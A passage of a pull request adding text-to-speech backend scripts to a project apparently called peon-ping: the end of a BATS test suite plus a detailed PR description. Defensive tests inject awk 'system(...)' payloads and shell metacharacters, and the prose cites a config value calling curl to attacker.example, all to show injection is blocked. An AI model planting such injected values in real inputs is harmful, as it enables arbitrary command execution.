+  [[ "$args" == *"-s 87"* ]] || [[ "$args" == *"-s 88"* ]]
+}
+
+@test "Rate 2.0: piper length-scale = 0.50" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mkdir -p "$TEST_DIR/piper-models"
+  touch "$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "2.0" "0.5"
+  [[ "$(mock_args piper)" == *"--length-scale 0.50"* ]]
+}
+
+@test "Rate 0.5: piper length-scale = 2.00" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mkdir -p "$TEST_DIR/piper-models"
+  touch "$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "0.5" "0.5"
+  [[ "$(mock_args piper)" == *"--length-scale 2.00"* ]]
+}
+
+@test "Volume 1.0: espeak-ng amplitude = 100" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "1.0"
+  [[ "$(mock_args espeak-ng)" == *"-a 100"* ]]
+}
+
+@test "Volume 0.0: espeak-ng amplitude = 0" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.0"
+  [[ "$(mock_args espeak-ng)" == *"-a 0"* ]]
+}
+
+# ============================================================
+# Contract behavior
+# ============================================================
+
+@test "Empty stdin: exits 0 without invoking any engine" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  run bash -c ": | bash '$TTS_SCRIPT' 'default' '1.0' '0.5'"
+  [ "$status" -eq 0 ]
+  ! mock_called "say"
+}
+
+@test "Whitespace-only stdin: exits 0 without invoking any engine" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  run bash -c "printf '   \\n' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5'"
+  [ "$status" -eq 0 ]
+  ! mock_called "say"
+}
+
+@test "Missing positional args use defaults (voice=default, rate=1.0, vol=0.5)" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT"
+  local args; args=$(mock_args espeak-ng)
+  [[ "$args" == *"-s 175"* ]]
+  [[ "$args" == *"-a 50"* ]]
+  # voice=default → no -v flag
+  [[ "$args" != *"-v default"* ]]
+}
+
+@test "Shell metacharacters in stdin reach engine uncorrupted" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  # Use single quotes so no interpolation occurs at caller side
+  local dangerous='$USER `whoami` "quoted" '"'"'apostrophe'"'"' & semicolon;'
+  printf '%s\n' "$dangerous" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  local args; args=$(mock_args say)
+  # Literal dollar-USER must survive, not an expansion
+  [[ "$args" == *'$USER'* ]]
+  [[ "$args" == *'`whoami`'* ]]
+  [[ "$args" == *'& semicolon;'* ]]
+}
+
+@test "Engine failure (non-zero exit) does NOT cause script to fail" {
+  mock_uname "Darwin"
+  mock_cmd "say" 42
+  with_mocks
+  run bash -c "echo 'hi' | bash '$TTS_SCRIPT' 'default' '1.0' '0.5'"
+  [ "$status" -eq 0 ]
+  mock_called "say"
+}
+
+# ============================================================
+# --list-voices mode
+# ============================================================
+
+@test "--list-voices on macOS: emits one voice name per line" {
+  mock_uname "Darwin"
+  # Mock `say -v '?'` with whitespace-separated voice table
+  cat > "$MOCK_BIN/say" <<'SCRIPT'
+#!/bin/bash
+if [ "$1" = "-v" ] && [ "$2" = "?" ]; then
+  cat <<'OUT'
+Alex                en_US    # Most people recognize me by my voice.
+Samantha            en_US    # Hello, my name is Samantha.
+Fred                en_US    # I sure like being inside this fancy computer
+OUT
+  exit 0
+fi
+echo "ARGS: $*" >> "${TEST_DIR}/say.log"
+SCRIPT
+  chmod +x "$MOCK_BIN/say"
+  with_mocks
+  run bash "$TTS_SCRIPT" --list-voices
+  [ "$status" -eq 0 ]
+  # First token of each line is the voice name
+  [[ "$output" == *"Alex"* ]]
+  [[ "$output" == *"Samantha"* ]]
+  [[ "$output" == *"Fred"* ]]
+}
+
+@test "--list-voices on Linux with espeak-ng only: prints voice column" {
+  mock_uname "Linux"
+  cat > "$MOCK_BIN/espeak-ng" <<'SCRIPT'
+#!/bin/bash
+if [ "$1" = "--voices" ]; then
+  cat <<'OUT'
+Pty Language Age/Gender VoiceName          File                 Other Languages
+ 5  en-us       M       english-us         gmw/en-US
+ 5  en-gb       M       english            gmw/en
+ 5  fr-fr       M       french             roa/fr
+OUT
+  exit 0
+fi
+echo "ARGS: $*" >> "${TEST_DIR}/espeak-ng.log"
+SCRIPT
+  chmod +x "$MOCK_BIN/espeak-ng"
+  with_mocks
+  run bash "$TTS_SCRIPT" --list-voices
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"english-us"* ]]
+}
+
+@test "--list-voices on Linux with piper model dir: prints model basenames first" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mkdir -p "$TEST_DIR/piper-models"
+  touch "$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  touch "$TEST_DIR/piper-models/en_GB-alba-medium.onnx"
+  with_mocks
+  run bash "$TTS_SCRIPT" --list-voices
+  [ "$status" -eq 0 ]
+  [[ "$output" == *"en_US-lessac-medium"* ]]
+  [[ "$output" == *"en_GB-alba-medium"* ]]
+  # Must not include .onnx extension
+  [[ "$output" != *".onnx"* ]]
+}
+
+@test "--list-voices on MSYS2: delegates to powershell.exe -ListVoices" {
+  mock_uname "MINGW64_NT-10.0"
+  cat > "$MOCK_BIN/powershell.exe" <<SCRIPT
+#!/bin/bash
+echo "ARGS: \$*" >> "$TEST_DIR/powershell.exe.log"
+# Fake voice output for list mode
+if [[ "\$*" == *"-ListVoices"* ]]; then
+  echo "Microsoft David"
+  echo "Microsoft Zira"
+fi
+SCRIPT
+  chmod +x "$MOCK_BIN/powershell.exe"
+  mkdir -p "$PEON_DIR/scripts"
+  echo "# dummy" > "$PEON_DIR/scripts/tts-native.ps1"
+  with_mocks
+  run bash "$TTS_SCRIPT" --list-voices
+  [ "$status" -eq 0 ]
+  mock_called "powershell.exe"
+  [[ "$(mock_args powershell.exe)" == *"-ListVoices"* ]]
+}
+
+# ============================================================
+# Piper sample-rate sidecar handling
+# ============================================================
+
+@test "Piper: sidecar with audio.sample_rate=16000 → aplay called with -r 16000" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mkdir -p "$TEST_DIR/piper-models"
+  local model="$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  touch "$model"
+  cat > "$model.json" <<'JSON'
+{"audio": {"sample_rate": 16000}}
+JSON
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  [[ "$(mock_args aplay)" == *"-r 16000"* ]]
+}
+
+@test "Piper: missing sidecar → aplay called with -r 22050 (default)" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mkdir -p "$TEST_DIR/piper-models"
+  touch "$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  # No .json sidecar
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  [[ "$(mock_args aplay)" == *"-r 22050"* ]]
+}
+
+@test "Piper: malformed sidecar → aplay called with -r 22050 (default)" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mkdir -p "$TEST_DIR/piper-models"
+  local model="$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  touch "$model"
+  echo "{not valid json" > "$model.json"
+  with_mocks
+  echo "hi" | bash "$TTS_SCRIPT" "default" "1.0" "0.5"
+  [[ "$(mock_args aplay)" == *"-r 22050"* ]]
+}
+
+@test "Piper: PEON_PIPER_MODEL env var overrides default model path" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mkdir -p "$TEST_DIR/custom"
+  touch "$TEST_DIR/custom/my-model.onnx"
+  with_mocks
+  PEON_PIPER_MODEL="$TEST_DIR/custom/my-model.onnx" \
+    bash -c "echo hi | bash '$TTS_SCRIPT' default 1.0 0.5"
+  mock_called "piper"
+  [[ "$(mock_args piper)" == *"--model $TEST_DIR/custom/my-model.onnx"* ]]
+}
+
+# ============================================================
+# awk injection hardening (card w3ciyq)
+#
+# rate/volume values originate in config.json and therefore must be treated
+# as untrusted input. The script passes them to awk via `-v` so awk sees
+# them as data, not program text. These tests assert that a rate string
+# carrying awk syntax cannot execute arbitrary code through the script and
+# that the invocation still exits 0 (contract: TTS never fails the caller).
+# ============================================================
+
+@test "awk hardening: hostile rate on macOS cannot inject awk code" {
+  mock_uname "Darwin"
+  mock_cmd "say"
+  with_mocks
+  local canary="$TEST_DIR/awk-injected.flag"
+  # A rate string that, if awk built the program via string interpolation,
+  # would use awk's system() to touch the canary file.
+  local hostile='system("touch '"$canary"'")'
+  run bash -c "echo 'hi' | bash '$TTS_SCRIPT' 'default' '$hostile' '0.5' 2>&1"
+  [ "$status" -eq 0 ]
+  # Canary must NOT exist — injection blocked by awk -v.
+  [ ! -f "$canary" ]
+}
+
+@test "awk hardening: hostile rate on Linux/espeak-ng cannot inject awk code" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  with_mocks
+  local canary="$TEST_DIR/awk-injected.flag"
+  local hostile='system("touch '"$canary"'")'
+  run bash -c "echo 'hi' | bash '$TTS_SCRIPT' 'default' '$hostile' '0.5' 2>&1"
+  [ "$status" -eq 0 ]
+  [ ! -f "$canary" ]
+}
+
+@test "awk hardening: hostile volume on Linux/espeak-ng cannot inject awk code" {
+  mock_uname "Linux"
+  mock_cmd "espeak-ng"
+  with_mocks
+  local canary="$TEST_DIR/awk-injected-vol.flag"
+  local hostile='system("touch '"$canary"'")'
+  run bash -c "echo 'hi' | bash '$TTS_SCRIPT' 'default' '1.0' '$hostile' 2>&1"
+  [ "$status" -eq 0 ]
+  [ ! -f "$canary" ]
+}
+
+@test "awk hardening: hostile rate on Linux/piper cannot inject awk code" {
+  mock_uname "Linux"
+  mock_cmd "piper"
+  mock_cmd "aplay"
+  mkdir -p "$TEST_DIR/piper-models"
+  touch "$TEST_DIR/piper-models/en_US-lessac-medium.onnx"
+  with_mocks
+  local canary="$TEST_DIR/awk-injected-piper.flag"
+  local hostile='system("touch '"$canary"'")'
+  run bash -c "echo 'hi' | bash '$TTS_SCRIPT' 'default' '$hostile' '0.5' 2>&1"
+  [ "$status" -eq 0 ]
+  [ ! -f "$canary" ]
+}
+
+@test "awk hardening: tts-native.sh uses 'awk -v' for rate/volume (source scan)" {
+  # Guards against regressing to `awk "BEGIN { printf ... $rate ... }"` style,
+  # which is the interpolation pattern that allowed injection in the first
+  # place.  If this test fires, check _speak_macos / _speak_piper /
+  # _speak_espeak_ng in scripts/tts-native.sh.
+  local bad
+  bad=$(grep -nE 'awk[[:space:]]+"[^"]*\$(rate|volume)' "$TTS_SCRIPT" || true)
+  [ -z "$bad" ]
+}
+
+# ============================================================
+# tests/setup.bash python3 portability guard (card w3ciyq)
+#
+# Pre-existing bug: hardcoded `/usr/bin/python3` in setup.bash prevented the
+# harness from running on Git Bash for Windows (18 tts.bats failures traced
+# to this).  The fix resolves python3 via PATH. This test codifies the fix
+# so it does not regress.
+# ============================================================
+
+@test "setup.bash: run_peon_tts resolves python3 via PATH (no hardcoded /usr/bin/python3)" {
+  local setup_bash="$(cd "$(dirname "${BATS_TEST_FILENAME}")" && pwd)/setup.bash"
+  [ -f "$setup_bash" ]
+  # run_peon_tts / enable_debug_logging must use $PEON_PY (PATH-resolved
+  # python3) rather than the Linux-only /usr/bin/python3 absolute path.
+  # Accept the whole file being free of that absolute path inside the
+  # run_peon_tts and enable_debug_logging function bodies.
+  local offenders
+  offenders=$(awk '
+    /^run_peon_tts\(\)/            { in_tgt = 1 }
+    /^enable_debug_logging\(\)/    { in_tgt = 1 }
+    in_tgt && /\/usr\/bin\/python3/ { print NR": "$0 }
+    in_tgt && /^\}/                { in_tgt = 0 }
+  ' "$setup_bash")
+  [ -z "$offenders" ]
+}


### PR DESCRIPTION
## Motivation

Flip `tts.enabled: true` on a current build, trigger a hook, and **nothing happens**. No voice, no error, no log line. The pipeline resolves the speech text, picks the script it wants to invoke, launches that script in the background, exits zero — and the only catch is that the script it just tried to launch has never existed on disk. The whole TTS feature is wired up to call into a file that was never written.

That's what this PR fixes. It ships the two scripts the hook has been calling into thin air:

- `scripts/tts-native.sh` — the Unix backend (macOS `say`, Linux piper/espeak-ng, plus a bridge for Git-Bash-on-Windows)
- `scripts/tts-native.ps1` — the Windows backend (SAPI5, the same engine behind Narrator)

After this merges, `peon tts on` actually speaks. The rest of the feature — trainer announcements, voice picking, the three sound-plus-speech sequencing modes — already works; it just hasn't had anything to talk to.

### How we got here

TTS in peon-ping was designed to land in three layers, and the first two are already in `main`:

1. **[ADR-001](docs/adr/ADR-001-tts-backend-architecture.md) (v2.20.1)** picked the architecture. Each TTS engine ships as its own small, standalone script. The hook's only job is to resolve text, pick a script, and run it in the background. No plugin framework, no shared library, no cross-backend coupling — just a calling convention: text in on stdin, voice/rate/volume in as arguments, always exit 0. That makes future backends (ElevenLabs, standalone Piper) additive — drop in a new script, add one `case` branch, done.
2. **PR #442** built the plumbing inside the hook that uses that convention: the `tts` config section, `peon update` backfill, speech-text template resolution, mode sequencing (`sound-then-speak` / `speak-only` / `speak-then-sound`), `.tts.pid` tracking, and the `Invoke-TtsSpeak` / `speak()` helpers that actually shell out to a backend.
3. **This PR** is layer 3 — the backends themselves. Nothing in `peon.sh` or `peon.ps1` changes; they were already trying to call these scripts. The diff is almost entirely new files: two backend scripts, two test suites, two small installer additions, and a handful of test-harness fixes that surfaced while getting the suite green on every platform.

## Approach

The backend side of the calling convention is tiny on paper, but three of the decisions it pins down deserve a paragraph each — they're not obvious from the diff, and they're where a reviewer is most likely to stop and ask "why didn't you just…?".

**Speech text comes in on stdin, not as a command-line argument.** Speech text is template-interpolated from values peon-ping does not control — project directory names, git branches, manifest `speech_text` fields, whatever the template renders. That text can contain quotes, backticks, newlines, and anything a repo or commit message might. If we passed it as `$1`, every caller would need airtight per-platform quoting, and one slip would let a hostile project name land in a shell. Stdin sidesteps the whole class of bug: the backend reads one line and speaks it, with no shell parsing of the content. ADR-001 made this call explicitly; the scripts honour it.

**Numeric parameters go through `awk -v`, never into awk program text.** Rate and volume come out of `config.json` as strings. If someone (or a compromised config) sets `"rate": 'system("curl attacker.example/...")'`, any script that interpolates that rate into an `awk` program is now running attacker-controlled awk. The Unix backend routes every numeric input through `awk -v r="$rate" 'BEGIN { ... }'` — values live in awk variables, never in awk source. Small hardening, zero runtime cost, and worth doing once at the bottom of the stack rather than remembering in every future backend.

**TTS failure is never a hook failure.** Synthesis errors, missing binaries, unsupported platforms, `Add-Type` failing on PS 7 Core, a broken SAPI5 voice — all of them exit 0 and move on. TTS is a nice-to-have output modality, and a broken voice should never block the IDE hook that triggered it. This matches ADR-001's "failure isolation" rule and mirrors how `play_sound()` already handles audio backend failures.

A few smaller choices worth a line each:

- **Linux dispatcher prefers piper over espeak-ng** when both `piper` and a `.onnx` model are present. Piper's neural voices are markedly higher quality; espeak-ng is the broadly-available fallback. The piper pipeline reads the model's sidecar `.onnx.json` for sample rate (default 22050) rather than hardcoding it.
- **MSYS2/MINGW bridges to `tts-native.ps1`** via `powershell.exe -File … -Voice … -Rate … -Vol …` instead of re-implementing SAPI5 in bash. Git-Bash-for-Windows users get the same output as native Windows users, and there's one SAPI5 implementation to maintain.
- **Windows script exposes a `PEON_TTS_DRY_RUN` / `PEON_TTS_TRACE_FILE` hook** so Pester can assert synthesis parameters (SAPI rate integer, SAPI volume integer, voice selection path) without needing a working SAPI5 stack on the CI runner. The trace writes a single-line JSON blob of the resolved parameters and skips the actual `Speak` call.
- **`-ListVoices` short-circuits in PowerShell's `begin` block** so the switch never reads stdin and returns immediately — `peon tts voices` doesn't hang on a tty.

### Rides along: `peon` CLI shim resiliency

The generated `peon.cmd` (and its bash counterpart) hard-coded `powershell -NoProfile -NonInteractive …`. On dev boxes where `PSModulePath` has PowerShell 7 module directories ahead of the 5.1 inbox paths — common if CloudSDK, Az, or similar tooling has touched the environment — Windows PowerShell 5.1 tries to load PS 7's incompatible `Microsoft.PowerShell.Security` module and fails with `Get-ExecutionPolicy : module could not be loaded`. Every `peon …` invocation breaks with an opaque error.

Both shims now probe for `pwsh` first (`where pwsh` in cmd, `command -v pwsh` in bash) and fall back to `powershell.exe` only when pwsh isn't on PATH. Users on pure PS 5.1 see identical behaviour; users with PS 7 installed route around the polluted-module-path failure mode entirely.

This fix is in the same PR because it surfaced while smoke-testing `tts-native.ps1` through the full `peon tts test` pipeline — the backend worked when invoked directly and failed through the CLI, which turned out to have nothing to do with TTS. Happy to split it into a separate commit if you'd prefer that shape.

## What changed

### Unix backend — `scripts/tts-native.sh` (229 lines)

Dispatcher on `uname -s`: Darwin → `say`, Linux → piper-if-available-else-espeak-ng, MINGW*/MSYS* → bridges to `tts-native.ps1` via `powershell.exe`, anything else → silent exit 0. Rate maps per engine (`wpm = rate * 200` for `say`, `rate * 175` for espeak-ng, `length_scale = 1.0 / rate` for piper). Volume maps to espeak-ng amplitude and is explicitly no-op on `say` and piper+aplay (neither supports per-invocation volume; `_ignore_unused_volume` documents the omission). `--list-voices` enumerates voices per platform: `say -v '?'` on macOS, `espeak-ng --voices` and piper model basenames on Linux, delegated to `tts-native.ps1 -ListVoices` on MSYS2.

### Windows backend — `scripts/tts-native.ps1` (224 lines)

SAPI5 via `System.Speech.Synthesis.SpeechSynthesizer`. `begin`/`process`/`end` blocks support both in-process pipelines (`"text" | & script`) and external `powershell -File` invocations (which don't bind stdin to `$InputText` — the `end` block reads `[Console]::In.ReadToEnd()` as the fallback). Rate maps to SAPI's `-10..+10` scale via `[int][math]::Round(($Rate - 1.0) * 10)` with clamping; volume maps to `0..100` via `[int][math]::Round($Vol * 100)` with clamping. Voice resolution probes `GetInstalledVoices()` — a miss falls through to the engine default with a `PEON_DEBUG=1` diagnostic. `Add-Type -AssemblyName System.Speech` is wrapped so PowerShell 7 Core on non-Windows or any missing-assembly scenario degrades to a no-op exit 0 rather than throwing.

### Installer plumbing — `install.sh` (+2 lines), `install.ps1` (+40 lines)

`install.sh` adds one `curl` for the remote-install path and one `chmod +x`; the local-install glob already picks the script up. `install.ps1` adds a copy-or-download block for `tts-native.ps1` matching the existing `win-play.ps1` / `win-notify.ps1` pattern, and updates both generated shims (`peon.cmd`, `peon` bash wrapper) with the pwsh-then-powershell fallback described above.

### Test harness improvements — `tests/setup.bash` (+14/-6), `tests/peon-packs.Tests.ps1` (+16/-2)

Two pre-existing environmental fragilities surfaced while running the new suite across platforms; both are fixed here rather than bounced to a separate PR, because both block the new tests from running green on existing infrastructure:

- `tests/setup.bash` replaced `/usr/bin/python3` hardcodes (four call sites) with `$PEON_PY` resolved via `command -v python3` → `command -v python` → hard fail. The hardcode worked on Linux CI and broke anywhere else the test suite was run.
- `tests/peon-packs.Tests.ps1` canonicalizes `$env:TEMP` through a `Push-Location`/`$PWD.Path` round-trip in the `status --verbose` test so 8.3 short-name paths (`C:\Users\RUNNER~1\…` on GitHub Windows runners) expand to their long form before comparison. Also tightens one `IndexOf` anchor that was matching a substring of a different setting, and one `Set-Location` → `Set-Location -LiteralPath` for paths containing bracket characters.

### Test suites — `tests/tts-native.bats` (619 lines), `tests/tts-native.Tests.ps1` (503 lines), `tests/adapters-windows.Tests.ps1` (+127 lines)

BATS suite: 42 scenarios covering platform dispatch (Darwin / Linux / MINGW / unknown), engine priority on Linux (piper with model present → piper, piper without model → espeak-ng, neither → silent exit), unit conversions across all three engines, `--list-voices` per platform, contract edges (empty stdin, shell-metacharacter text, missing positional arguments defaulting correctly), and piper sidecar parsing including malformed JSON.

Pester suite: 40 scenarios covering rate/volume mapping and clamping at the boundaries, stdin pipeline binding in both the in-process and `-File` invocation paths, voice selection including spaced names (`Microsoft David Desktop`), `-ListVoices` output, and error containment (`Add-Type` failure, synthesis exception, missing voice). Both suites rely on the `PEON_TTS_DRY_RUN` / `PEON_TTS_TRACE_FILE` hook and PATH-shadowed engine stubs rather than a live SAPI5 or espeak-ng — the real script body executes against mocks that log invocation shape to a tracefile.

`adapters-windows.Tests.ps1` gains structural tests asserting the new script has the expected parameter shape and comment-based help, does not contain `ExecutionPolicy Bypass`, clamps rate and volume, and two tests asserting the pwsh-then-powershell fallback is present in the shims generated by `install.ps1`.

## Verification

Run locally on Windows (Git Bash + bats-core 1.10 and Pester 5.6):

- `bats tests/tts-native.bats` — **42/42 green**
- `Invoke-Pester tests/tts-native.Tests.ps1` — **40/40 green**
- `Invoke-Pester tests/adapters-windows.Tests.ps1` — **22/22 green** on the new and modified tests, no regressions on the other 416
- Live audibility smoke on Windows SAPI5 via `'hello from peon' | pwsh -File scripts/tts-native.ps1` — speaks

Pending:

- Maintainer real-hardware smoke on macOS `say` and a Linux host with `espeak-ng` installed (`echo 'hello' | bash scripts/tts-native.sh default 1.0 0.5`) — I don't have either of those to hand on this machine.
- Hook-return latency within ±50 ms of the `tts.enabled: false` baseline (measurable via the `[exit] duration_ms` line from v2/m4 structured logging).

GitHub Actions on this PR: BATS on `macos-latest` **passing**, Pester on `windows-latest` **passing**. The only failing check is Vercel's deploy preview, which is a workspace authorization issue unrelated to code (`"A member of the Team first needs to authorize it"`).

## Risks and limitations

- **Per-engine volume asymmetry.** macOS `say` and piper+aplay ignore the volume argument — neither engine exposes a per-invocation volume control, and routing through a volume-capable wrapper (e.g. `ffmpeg`) on every invocation adds latency for no meaningful gain when system volume is already the user's primary control. espeak-ng and SAPI5 honour it. Documented in the script header and in `docs/designs/tts-native.md §Risks`.
- **Piper sample rate fallback.** If the `.onnx.json` sidecar is missing or unparseable, the script defaults to 22050 Hz. A model trained at 16 kHz will play back sounding fast and chipmunky. The piper binary doesn't expose a "read rate from model metadata" switch, so sidecar-or-default is the pragmatic path.
- **MSYS2/MINGW path assumes `powershell.exe` on PATH.** If a user has disabled Windows PowerShell entirely (only `pwsh` installed, `powershell.exe` removed), the bridge won't find the executable. The `peon.cmd` shim's pwsh-first fallback doesn't apply here because the bridge has to launch `powershell.exe` explicitly to access `System.Speech`. In practice this is vanishingly rare — PS 5.1 is a Windows inbox component — but noting it for completeness.
- **No CHANGELOG/VERSION bump in this PR.** Those are release-time decisions; I've left them to you.
- **One debug-capture commit (`95ce6bc`)** remains in the history from the 8.3-path investigation. Its output was superseded by the fix in `4b7f115` and it can safely be squashed or dropped on rebase if you prefer a linear feature history.

## How to review

Suggested order — the diff is large (+1774 lines) but most of it is test tables:

- [ ] `docs/adr/ADR-001-tts-backend-architecture.md` (already merged in v2.20.1, not in this diff, but the contract the two new scripts implement — worth skimming first if you haven't recently)
- [ ] `scripts/tts-native.sh` — the Unix backend; start at the entry point at the bottom and read upward
- [ ] `scripts/tts-native.ps1` — the Windows backend; the `begin`/`process`/`end` structure mirrors `win-play.ps1`
- [ ] `install.sh` / `install.ps1` hunks — small and mechanical, safe to skim
- [ ] `tests/tts-native.bats` — engine stubs are at the top of the file; test bodies are the bulk
- [ ] `tests/tts-native.Tests.ps1` — same shape as the BATS suite
- [ ] `tests/adapters-windows.Tests.ps1` — structural assertions only, fast review
- [ ] `tests/setup.bash` and `tests/peon-packs.Tests.ps1` — the environmental fixes; each one is a localized change with a comment explaining the symptom

## Follow-up work

None planned by me. Two paths for future backends (ElevenLabs and Piper-standalone) are already scoped in ADR-001 and on the roadmap; each adds a new `scripts/tts-<backend>.{sh,ps1}` pair without touching `tts-native`.

---

This is a fork-maintained feature branch. Happy to rebase, reshape, or split on request.

